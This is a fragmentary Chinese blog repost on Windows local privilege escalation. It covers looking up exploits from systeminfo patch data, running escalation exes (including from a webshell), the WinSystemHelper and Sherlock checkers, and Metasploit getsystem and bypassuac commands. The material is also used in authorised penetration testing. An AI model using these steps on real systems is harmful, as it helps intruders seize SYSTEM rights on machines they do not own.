1.可利用漏洞信息收集收集本机systeminfo中补丁信息 在提权辅助平台 https://i./tiquan/ 中查询可利用exp 然后查询exp,选择对应的Exp下载运行即可。 提权Exp的运行方式,一般有以下几种: 直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system 在WebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令 利用MSF等工具 C 源码,Python脚本,PowerShell脚本等特殊方式 2.WinSystemHelper使用WinSystemHelper检查可利用的漏洞。该工具适合在任何Windows服务器上进行已知提权漏洞的检测 https://github.com/brianwrf/WinSystemHelper 上传WinSysHelper.bat、explt2003.txt、expgt2003.txt,运行bat查看结果 然后在可利用的Exp中任意下载一个并执行即可 3.SherlockSherlock是在Windows下用于本地提权的PowerShell脚本
getsystemmeterpreter> getsystem BypassUAC
meterpreter> background # 后台session msf> use exploit/windows/local/bypassuac msf> set SESSION <session_id> # 后台session时会返回session_id,如不清楚可以使用命令sessions -l msf> run 内核提权
作者及来源:Leticia's Blog |
|
来自: 新用户36657816 > 《待分类》